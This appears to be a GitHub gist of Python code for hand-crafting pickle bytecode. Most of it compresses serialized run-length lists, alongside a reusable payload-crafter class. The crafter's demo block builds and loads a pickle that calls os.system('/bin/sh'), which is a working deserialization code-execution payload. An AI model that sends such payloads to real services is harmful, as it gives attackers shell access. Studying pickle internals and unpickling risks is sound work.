Last active
February 29, 2024 12:52
-
-
Save Xornet-Euphoria/0691ebe626ed1f6dfcc24884fde59e41 to your computer and use it in GitHub Desktop.
Pickle bytecode optimization (with my own script for crafting payload)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import pickle | |
import pickletools | |
import payload_crafter | |
class RunLengthCrafter(payload_crafter.Crafter): | |
def __init__(self, *, check_stop=False) -> None: | |
super().__init__(check_stop=check_stop) | |
def create_single_element_list(self, x, length): | |
self.import_from("builtins", "getattr", use_stack=False) | |
self._single_element_list_internal(x, length, is_first=True) | |
return self | |
def _single_element_list_internal(self, x, length, memo_idx=0, is_first=False): | |
self.add_payload(pickle.EMPTY_LIST) | |
self.push_int(x) | |
self.add_payload(pickle.APPEND) | |
if is_first: | |
self.push_str("__mul__") | |
self.memoize() | |
else: | |
self.get_memo(memo_idx) | |
self.call_f(2) | |
self.push_int(length) | |
self.call_f(1) | |
return self | |
def create_run_length_single_element_list(self, x, length, memo_idx=0, is_first=False): | |
if is_first: | |
self.import_from("builtins", "getattr", use_stack=False) | |
self.memoize() # idx will be 0 | |
else: | |
self.get_memo(memo_idx) | |
return self._single_element_list_internal(x, length, memo_idx=1, is_first=is_first) | |
# sum([l2, l3, ...], l1) | |
# -> l1 + l2 + l3 + ... | |
def run_length(self, t): | |
self.import_from("builtins", "sum", use_stack=False) | |
# if len(t) < 4 then using pickle.TUPLE<n> is more optimized than pickle.MARK and pickle.LIST | |
# note: sum([l2, l3, l4], l1) == sum((l2, l3, l4), l1) | |
self.add_payload(pickle.MARK) | |
for i, (x, length) in enumerate(t[1:]): | |
self.create_run_length_single_element_list(x, length, is_first=(i == 0)) | |
self.add_payload(pickle.LIST) | |
x, length = t[0] | |
self.create_run_length_single_element_list(x, length) | |
self.call_f(2) | |
self.stop() | |
return self | |
def search_boundary_list(): | |
for i in range(1, 256): | |
target = [1] * i | |
org_p = pickle.dumps(target) | |
crafter = RunLengthCrafter() | |
optimized_p = crafter.create_single_element_list(1, i).get_payload(check_stop=True) | |
assert pickle.loads(org_p) == pickle.loads(optimized_p) | |
if (l1 := len(optimized_p), l2 := len(org_p)) and l1 < l2: | |
print(f"boundary length: {i}") | |
print(f"- org: {l2}") | |
print(f"- opt: {l1}") | |
break | |
def test_run_length(): | |
crafter = RunLengthCrafter() | |
from itertools import groupby | |
l = [0] * 0x40 + [1] * 0x20 + [2] * 0x10 | |
t = [(x, len(list(y))) for x, y in groupby(l)] | |
crafter.run_length(t) | |
res = crafter.loads() | |
pickletools.dis(crafter.get_payload(check_stop=True)) | |
print(crafter.get_length() + 1) | |
assert res == l | |
assert crafter.get_length() + 1 < len(pickle.dumps(l)) | |
def test(): | |
search_boundary_list() | |
print("=" * 40) | |
test_run_length() | |
if __name__ == "__main__": | |
test() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import pickle | |
class Crafter: | |
def __init__(self, *, check_stop=False) -> None: | |
self.payload = b"" | |
self.check_stop = check_stop # reserved and not implemented yet | |
# self.payload += b の wrapperに過ぎないが、オーバーライドしてデバッグに使うといった用途を考えている | |
def add_payload(self, b: bytes): | |
self.payload += b | |
def push_int(self, n: int): | |
if n < 0: | |
raise NotImplementedError("positive only") | |
if n < 0x100: | |
self._push_int1(n) | |
return | |
if n < 0x10000: | |
self._push_int2(n) | |
return | |
# todo: 4byte integer | |
raise NotImplementedError("1 or 2 byte integer only") | |
def _push_int1(self, n: int): | |
self.add_payload(pickle.BININT1) | |
self._add_number1(n) | |
def _push_int2(self, n: int): | |
self.add_payload(pickle.BININT2) | |
self._add_number2(n) | |
def push_str(self, s: str): | |
length = len(s) | |
assert length < 2**32 | |
if length < 0x100: | |
self.add_payload(pickle.SHORT_BINSTRING) | |
self._add_number1(length) | |
self.add_payload(s.encode()) | |
return | |
self.add_payload(pickle.BINSTRING) | |
self.add_payload(length.to_bytes(4, "little")) | |
self.add_payload(s.encode()) | |
# utils about list, tuple and dict | |
def to_tuple(self, cnt: int=0, use_mark: bool=False): | |
if cnt in range(0, 4) and not use_mark: | |
self.add_payload(pickle._tuplesize2code[cnt]) # type: ignore | |
else: | |
# todo: check whether MARK(@) is used in the payload | |
self.add_payload(pickle.TUPLE) | |
# utils about objects that is not pickle-native (import, function and etc) | |
def import_from(self, module: str, name: str, *, use_stack=True): | |
if use_stack: | |
self.push_str(module) | |
self.push_str(name) | |
self.add_payload(pickle.STACK_GLOBAL) | |
else: | |
# shorter than STACK_GLOBAL | |
# if other optimization techniques are used (for example, memoize frequently used strings) | |
# this method may not be effective | |
self.add_payload(pickle.GLOBAL) | |
self.add_payload(module.encode("utf-8")) | |
self._add_newline() | |
self.add_payload(name.encode("utf-8")) | |
self._add_newline() | |
def call_f(self, argc: int=0, use_mark=False): | |
self.to_tuple(argc, use_mark=use_mark) | |
self.reduce() | |
def reduce(self): | |
self.add_payload(pickle.REDUCE) | |
def stop(self): | |
self.add_payload(pickle.STOP) | |
# utils about memo | |
# todo: emulate memo and estimate index in memoize | |
# todo: put_memo | |
def memoize(self): | |
self.add_payload(pickle.MEMOIZE) | |
def get_memo(self, idx: int): | |
if idx < 0x100: | |
self.add_payload(pickle.BINGET) | |
self._add_number1(idx) | |
return | |
# todo: pickle.LONGBINGET | |
self.add_payload(pickle.GET) | |
self._add_number(idx) | |
self._add_newline() | |
# interfaces about payload | |
def get_payload(self, check_stop=False) -> bytes: | |
if check_stop: | |
if self.payload[-1] != ord(pickle.STOP): | |
self.stop() | |
return self.payload | |
def get_length(self, with_stop: bool=False) -> int: | |
l = len(self.payload) | |
return l + 1 if with_stop else l | |
def loads(self, check_stop=False): | |
_payload = self.get_payload(check_stop) | |
res = pickle.loads(_payload) | |
return res | |
def clear(self): | |
self.payload = b"" | |
# utils for internal | |
def _add_newline(self): | |
self.add_payload(b"\n") | |
def _add_number(self, n: int): | |
self.add_payload(str(n).encode()) | |
def _add_number1(self, n: int): | |
self._add_number_to_bytes(n, 1) | |
def _add_number2(self, n: int): | |
self._add_number_to_bytes(n, 2) | |
def _add_number4(self, n: int): | |
self._add_number_to_bytes(n, 4) | |
def _add_number_to_bytes(self, n: int, length: int): | |
self.add_payload(n.to_bytes(length, "little")) | |
if __name__ == "__main__": | |
payload = Crafter() | |
payload.import_from("os", "system", use_stack=False) | |
payload.push_str("/bin/sh") | |
payload.call_f(1) | |
pb = payload.get_payload(check_stop=True) | |
print(len(pb)) | |
r = pickle.loads(pb) | |
print(r) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment